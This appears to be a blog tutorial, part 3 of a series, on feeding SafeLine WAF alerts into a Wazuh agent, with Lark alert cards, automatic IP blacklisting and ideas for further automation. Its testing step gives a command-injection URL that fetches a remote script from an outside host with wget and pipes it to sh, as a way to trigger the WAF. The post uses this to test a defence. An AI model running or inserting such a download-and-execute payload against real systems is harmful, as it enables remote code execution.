Integrating Open Source WAF with Wazuh (Part 3)
Carrie
Posted on October 12, 2024
This article is written by a SafeLine WAF user, 曼联小胖子
Part 1 is here.
Part 2 is here.
Wazuh Agent Configuration
- Log in to the Safeline WAF server and configure
ossec
to monitor thewaf_alert.log
file:
vim /var/ossec/etc/ossec.conf
Add the following configuration:
<localfile>
<log_format>syslog</log_format>
<location>/var/log/waf_alert/waf_alert.log</location>
</localfile>
It should be like the image below.
- Restart Wazuh Agent to Apply Configuration
systemctl restart wazuh-agent
Testing the Setup
Conduct a vulnerability scan on the website or input attack test statements to trigger alerts and check the interception results. For example:
https://a.test.com/view.php?doc=11.jpg&format=swf&isSplit=true&page=||wget http://spotslfy.com/wget.sh -O-|sh
Lark Alert Card
The Lark alert card will display clear messages that all relevant personnel in the group can see.
Safeline WAF IP Blacklist
You can see the attacking source IP, such as 47.1.1.1, automatically added to the blacklist.
When the attacker tries to access the website again, they will be blocked.
Checking the Number of Blacklisted IPs
To count the total number of blacklisted IPs, check the log:
cat /var/log/waf/block_ip.log
Further Ideas
Due to limited personal resources, there are two additional ideas regarding Lark alerts that I haven’t implemented. If you’re interested and have the development skills, feel free to explore further:
- Avoiding False IP Bans: To avoid mistakenly banning IPs, you could add two interactive buttons to the Feishu card message: “Confirm IP Ban” and “Ignore.” Clicking “Confirm IP Ban” would trigger the IP ban and simultaneously send a notification to the group with the handling result.
2.Alert Data Analysis: Currently, alert information pushed to the Feishu group cannot be statistically analyzed. Feishu multi-dimensional tables have basic Excel capabilities and powerful automation processes. With well-designed table fields, automation configurations, and API development, it can serve as a low-cost security data center and SOAR. For example, it could periodically push security weekly reports to the Feishu security workgroup, periodically summarize malicious IP lists, and push them to security devices.
That's the end.
Posted on October 12, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.